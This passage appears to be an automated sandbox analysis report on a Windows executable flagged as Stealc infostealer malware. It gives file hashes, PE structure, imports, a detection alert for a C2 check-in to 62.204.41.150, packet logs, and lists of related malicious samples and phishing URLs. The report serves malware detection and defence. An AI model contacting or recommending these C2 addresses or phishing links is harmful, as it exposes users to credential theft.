                                                                  https://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                  • 199.232.210.172
                                                                  45Ywq5ad5H.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  • 199.232.214.172
                                                                  f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 199.232.214.172
                                                                  lCVFGKfczi.exeGet hashmaliciousVidarBrowse
                                                                  • 199.232.214.172
                                                                  1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                                  • 199.232.214.172
                                                                  NdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  • 199.232.210.172
                                                                  vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                                                  • 199.232.214.172
                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                  • 199.232.214.172
                                                                  s-part-0044.t-0009.fb-t-msedge.netTuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                  • 13.107.253.72
                                                                  https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.72
                                                                  original.emlGet hashmaliciousTycoon2FABrowse
                                                                  • 13.107.253.72
                                                                  http://www.twbcompany.comGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.72
                                                                  COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                  • 13.107.253.72
                                                                  https://pub-53d8c8824459455a8bb62d4b9a0d5f2f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.253.72
                                                                  https://pub-737d748721344356b3ba725600a8404d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.253.72
                                                                  http://ikergalindez.github.io/gofish/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.253.72
                                                                  http://pub-ba5a046c69974217b0431bca4ba43740.r2.dev/rep.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.253.72
                                                                  Statement of Account COFCO Pte Ltd.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.107.253.72
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TNNET-ASTNNetOyMainnetworkFIRJQySowVRb.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150
                                                                  1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150
                                                                  5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150
                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150
                                                                  0h5IfpqflF.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.159
                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.159
                                                                  552RZ9fPMe.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.159
                                                                  vmgon5Zqja.exeGet hashmaliciousStealc, VidarBrowse
                                                                  • 62.204.41.159
                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.159
                                                                  956d73b7f041.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.159
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  1138de370e523e824bbca92d049a3777TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                  • 13.107.253.72
                                                                  lCVFGKfczi.exeGet hashmaliciousVidarBrowse
                                                                  • 13.107.253.72
                                                                  1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                                  • 13.107.253.72
                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                  • 13.107.253.72
                                                                  https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.72
                                                                  https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.72
                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                  • 13.107.253.72
                                                                  https://fenster-mark-gmbhsharefile.btn-ebikes.com/Get hashmaliciousUnknownBrowse
                                                                  • 13.107.253.72
                                                                  Hscni Remittance_8115919700_16831215.htmlGet hashmaliciousTycoon2FABrowse
                                                                  • 13.107.253.72
                                                                  xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                  • 13.107.253.72
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.6552070716266695
                                                                  Encrypted:false
                                                                  SSDEEP:96:AuFoEIoQ0K2sgy9KAwf5QXIDcQvc6QcEVcw3cE/X+HbHg/5hZAX/d5FMT2SlPkpL:vBIoQj2Y0BU/wjhzuiF/Z24IO8u
                                                                  MD5:36FD7A1DCB3C1247D34FAF4FADC98F7C
                                                                  SHA1:82259CBEA81843A002FCB5D09C6FCF534645D7C3
                                                                  SHA-256:A9D94DCE4125DAA1D64712153B21CFDCF71CB51B2C4DD2E15F213FB383A4BAF2
                                                                  SHA-512:7121243554B4E64E44573FC37DC6B479BDCC04E0A4D03D51F16D5B201A93606952C1266F610694E812205D74288053D0B83C5186DC94B1086D2CE20405D5845C
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.5.9.9.3.7.2.9.4.6.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.5.9.9.4.0.8.8.8.3.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.4.b.a.d.0.9.-.4.b.a.b.-.4.8.b.2.-.a.d.3.d.-.1.b.4.5.2.8.0.2.d.5.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.b.9.3.c.a.2.-.a.1.3.2.-.4.a.b.4.-.9.8.e.f.-.e.9.b.8.4.6.c.a.7.f.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.e.w.8.S.X.j.X.E.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.9.0.-.0.0.0.1.-.0.0.1.4.-.3.d.a.d.-.4.5.f.c.d.e.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.7.a.1.d.b.4.e.5.b.c.d.b.c.f.a.1.f.c.d.8.5.9.1.d.2.e.3.e.e.8.7.0.8.a.b.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 17:33:13 2024, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):33388
                                                                  Entropy (8bit):1.7315578571379966
                                                                  Encrypted:false
                                                                  SSDEEP:96:5u8eDXCte5Tfmi779PYB4k5/7PjqBB7wgoWI0WI4UI4g6Y9PnQDtUm:rImOSFo7wog6Y9PQDtU
                                                                  MD5:2325E982C3AF62E750D1603C40D0F123
                                                                  SHA1:948BE6836B448E5CBBFC9A69757916F386C7892F
                                                                  SHA-256:2C3EA01BF708AC90799D20B9A5129A4F70E152128FB74013C71A5B2D49A87235
                                                                  SHA-512:DE8593A263DC8EBEFC45347D0059EA9A56B951112060B2C45F2055511BCF1AA69B92FB38B9575F5DBB94644C7C7DAF93BD697B710737FC54B9F807FD4A3D424B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP..a..... .......Y..g........................d...........................T.......8...........T................w......................................................................................................eJ..............GenuineIntel............T...........Y..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8326
                                                                  Entropy (8bit):3.7044698082073695
                                                                  Encrypted:false
                                                                  SSDEEP:192:R6l7wVeJLt6K6YSTSUzgmfo11FprZ89bcosfYh0m:R6lXJx6K6YmSUzgmfo11OcbfYH
                                                                  MD5:142D9434D1EC2F75490E7C485B5AC575
                                                                  SHA1:A39C28EA27C19E1DA913ECE7307CC790366A68C9
                                                                  SHA-256:73FDF55048AD4FF2BFD6D089522A0BC095BAAD1B5F398C3F42D3A728F3D360C4
                                                                  SHA-512:B7DB8D6856AF221CC135DB2464D24630A8741A21D1654CD4B2DC8DCCBAE005CB48FA695ECF7D92CC79C48AE0FF970C3205693A2D3C08312FDBFD0D71ADEA4C12
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.3.2.<./.P.i.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4678
                                                                  Entropy (8bit):4.499279508688192
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwWl8zsDuJg77aI9c/WpW8VYzYm8M4Jx3FMx+q8wKFaQlbZd:uIjfDkI72u7VTJOyaQlbZd
                                                                  MD5:6C37C69F2F4B0278BAD9A9F204224A90
                                                                  SHA1:E046DDACD1A56512F78213998667C9D9891C870E
                                                                  SHA-256:BBA640E7FF19AF0A052B0EB601DCDE79A7DFF15E34AE67FF87F237C0A61FC853
                                                                  SHA-512:1182745E9BB2922FF7147749114EE3233F906E6C557659719FE65792C0384DCC921885B9C8889051F214990F79451FD9C56781B61C307F98B4FD97873EB55FA4
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.37270797884068
                                                                  Encrypted:false
                                                                  SSDEEP:6144:MFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNFiL:8V1QyWWI/glMM6kF7Tq
                                                                  MD5:B0D377AC8D346D6CE1784252F32A3AD7
                                                                  SHA1:339AEFB092BCFB6C7180D9A96ADB8A4808EC806B
                                                                  SHA-256:3F50A580BA5EC6EBF8DD448FE2A98B5155D63CE2D57810DC9398BF0599CB4C45
                                                                  SHA-512:B691F30909137ACA72258D70B0493075B43E55F93791D4DCEA65EF23E16C1D78DFFFB06D5658D3B27740D83260533D264A2555DEDF8C39136D1389EC0BD82064
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.682336805567385
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Aew8SXjXEb.exe
                                                                  File size:505'344 bytes
                                                                  MD5:c89c82ab6576a83a2a32bbffe44ef4d7
                                                                  SHA1:7a1db4e5bcdbcfa1fcd8591d2e3ee8708ab41a02
                                                                  SHA256:11cb48154b2285d427e5f3bff51c1dde9f59a8b8cfd04fa4d3d3f6e4b0124d44
                                                                  SHA512:be6f1b11dd4ec57e44ba70485a129e4c7a42261e9f1a5909026bd4b19c1d7ee445baaf775c9650761271051719cea1354e55902872d64c5180aa5271f122e862
                                                                  SSDEEP:12288:CQJlka1Ilavm3yVUhEgPlV2fBqT5OY4S:Cza1WLliBqA
                                                                  TLSH:48B4F15174C18072D573223206F5DAB56E3EB8710A62AEDF67840FBE4F30291E7319AB
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.9.y.WUy.WUy.WU..TTu.WU..RT..WU..STl.WU..VTz.WUy.VU!.WUilTTm.WUilSTk.WUilRT4.WU1m^Tx.WU1m.Ux.WU1mUTx.WURichy.WU...............
                                                                  Icon Hash:00928e8e8686b000
                                                                  Entrypoint:0x406f52
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67041216 [Mon Oct 7 16:53:42 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:d10af643340e1121562abe3e6bd5b0e1
                                                                  Instruction
                                                                  call 00007F431C68F460h
                                                                  jmp 00007F431C68E9CFh
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  mov eax, dword ptr [ebp+08h]
                                                                  push esi
                                                                  mov ecx, dword ptr [eax+3Ch]
                                                                  add ecx, eax
                                                                  movzx eax, word ptr [ecx+14h]
                                                                  lea edx, dword ptr [ecx+18h]
                                                                  add edx, eax
                                                                  movzx eax, word ptr [ecx+06h]
                                                                  imul esi, eax, 28h
                                                                  add esi, edx
                                                                  cmp edx, esi
                                                                  je 00007F431C68EB6Bh
                                                                  mov ecx, dword ptr [ebp+0Ch]
                                                                  cmp ecx, dword ptr [edx+0Ch]
                                                                  jc 00007F431C68EB5Ch
                                                                  mov eax, dword ptr [edx+08h]
                                                                  add eax, dword ptr [edx+0Ch]
                                                                  cmp ecx, eax
                                                                  jc 00007F431C68EB5Eh
                                                                  add edx, 28h
                                                                  cmp edx, esi
                                                                  jne 00007F431C68EB3Ch
                                                                  xor eax, eax
                                                                  pop esi
                                                                  pop ebp
                                                                  ret
                                                                  mov eax, edx
                                                                  jmp 00007F431C68EB4Bh
                                                                  push esi
                                                                  call 00007F431C68F774h
                                                                  test eax, eax
                                                                  je 00007F431C68EB72h
                                                                  mov eax, dword ptr fs:[00000018h]
                                                                  mov esi, 0047B34Ch
                                                                  mov edx, dword ptr [eax+04h]
                                                                  jmp 00007F431C68EB56h
                                                                  cmp edx, eax
                                                                  je 00007F431C68EB62h
                                                                  xor eax, eax
                                                                  mov ecx, edx
                                                                  lock cmpxchg dword ptr [esi], ecx
                                                                  test eax, eax
                                                                  jne 00007F431C68EB42h
                                                                  xor al, al
                                                                  pop esi
                                                                  ret
                                                                  mov al, 01h
                                                                  pop esi
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  cmp dword ptr [ebp+08h], 00000000h
                                                                  jne 00007F431C68EB59h
                                                                  mov byte ptr [0047B350h], 00000001h
                                                                  call 00007F431C68EE0Ah
                                                                  call 00007F431C691D27h
                                                                  test al, al
                                                                  jne 00007F431C68EB56h
                                                                  xor al, al
                                                                  pop ebp
                                                                  ret
                                                                  call 00007F431C69A789h
                                                                  test al, al
                                                                  jne 00007F431C68EB5Ch
                                                                  push 00000000h
                                                                  call 00007F431C691D2Eh
                                                                  pop ecx
                                                                  jmp 00007F431C68EB3Bh
                                                                  mov al, 01h
                                                                  pop ebp
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  cmp byte ptr [0047B351h], 00000000h
                                                                  je 00007F431C68EB56h
                                                                  mov al, 01h
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2c6c00x28.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x3d8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7d0000x1ad4.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x2abc00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ab000x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x230000x12c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x210f00x2120015b4eac2d210513051a585f07a7e32c6False0.5865713443396227data6.670163410877792IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x230000x9d780x9e00bf0b7580d5fe33f288e589cde1691485False0.43517602848101267data4.9591797408068725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x2d0000x4ef780x4e20009b23c62cc20b3a796248a28654b24fdFalse0.989946875DOS executable (block device driver \377\377\377\377,32-bit sector-support)7.990487855371462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x7c0000x3d80x4005584c2fd2a321b3ff4d89d84727643beFalse0.4404296875data3.290569201128903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x7d0000x1ad40x1c0016092792d232aa39e24b762c0f4a37abFalse0.7273995535714286data6.393192590005456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0x7c0580x380dataEnglishUnited States0.46205357142857145
                                                                  DLLImport
                                                                  KERNEL32.dllAttachConsole, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-10-07T19:33:15.882048+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.84970762.204.41.15080TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 7, 2024 19:33:10.857407093 CEST49673443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:11.214905024 CEST49672443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:11.996170998 CEST49676443192.168.2.852.182.143.211
                                                                  Oct 7, 2024 19:33:14.621141911 CEST4967780192.168.2.8192.229.211.108
                                                                  Oct 7, 2024 19:33:14.710458994 CEST4970780192.168.2.862.204.41.150
                                                                  Oct 7, 2024 19:33:14.715482950 CEST804970762.204.41.150192.168.2.8
                                                                  Oct 7, 2024 19:33:14.715569019 CEST4970780192.168.2.862.204.41.150
                                                                  Oct 7, 2024 19:33:14.715749979 CEST4970780192.168.2.862.204.41.150
                                                                  Oct 7, 2024 19:33:14.720732927 CEST804970762.204.41.150192.168.2.8
                                                                  Oct 7, 2024 19:33:15.399121046 CEST804970762.204.41.150192.168.2.8
                                                                  Oct 7, 2024 19:33:15.399189949 CEST4970780192.168.2.862.204.41.150
                                                                  Oct 7, 2024 19:33:15.403103113 CEST4970780192.168.2.862.204.41.150
                                                                  Oct 7, 2024 19:33:15.408018112 CEST804970762.204.41.150192.168.2.8
                                                                  Oct 7, 2024 19:33:15.878268957 CEST804970762.204.41.150192.168.2.8
                                                                  Oct 7, 2024 19:33:15.882047892 CEST4970780192.168.2.862.204.41.150
                                                                  Oct 7, 2024 19:33:17.163652897 CEST4970780192.168.2.862.204.41.150
                                                                  Oct 7, 2024 19:33:20.464867115 CEST49673443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:20.824311972 CEST49672443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:22.516761065 CEST4434970623.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:22.516905069 CEST49706443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.714260101 CEST49706443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.714375973 CEST49706443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.718080997 CEST49723443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.718130112 CEST4434972323.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:31.718245029 CEST49723443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.718493938 CEST49723443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.718518972 CEST4434972323.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:31.721349955 CEST4434970623.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:31.721373081 CEST4434970623.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:31.731960058 CEST4434972323.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:31.734992981 CEST49724443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.735017061 CEST4434972423.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:31.735075951 CEST49724443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.736126900 CEST49724443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:33:31.736164093 CEST4434972423.206.229.226192.168.2.8
                                                                  Oct 7, 2024 19:33:31.736212969 CEST49724443192.168.2.823.206.229.226
                                                                  Oct 7, 2024 19:34:28.011496067 CEST49730443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.011529922 CEST4434973013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.011758089 CEST49730443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.012335062 CEST49730443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.012351990 CEST4434973013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.024524927 CEST4434973013.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.024915934 CEST49731443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.024935961 CEST4434973113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.025052071 CEST49731443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.025343895 CEST49731443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.025357008 CEST4434973113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.537823915 CEST4434973113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.538741112 CEST4434973113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.538829088 CEST49731443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.604162931 CEST49731443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.604176998 CEST4434973113.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.634665966 CEST49732443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.634710073 CEST4434973213.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.634732962 CEST49733443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.634759903 CEST4434973313.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.634769917 CEST49732443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.634803057 CEST49733443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.635426998 CEST49732443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.635440111 CEST4434973213.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.635719061 CEST49733443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.635732889 CEST4434973313.107.253.72192.168.2.8
                                                                  Oct 7, 2024 19:34:28.636101007 CEST49734443192.168.2.813.107.253.72
                                                                  Oct 7, 2024 19:34:28.636112928 CEST4434973413.107.253.72192.168.2.8
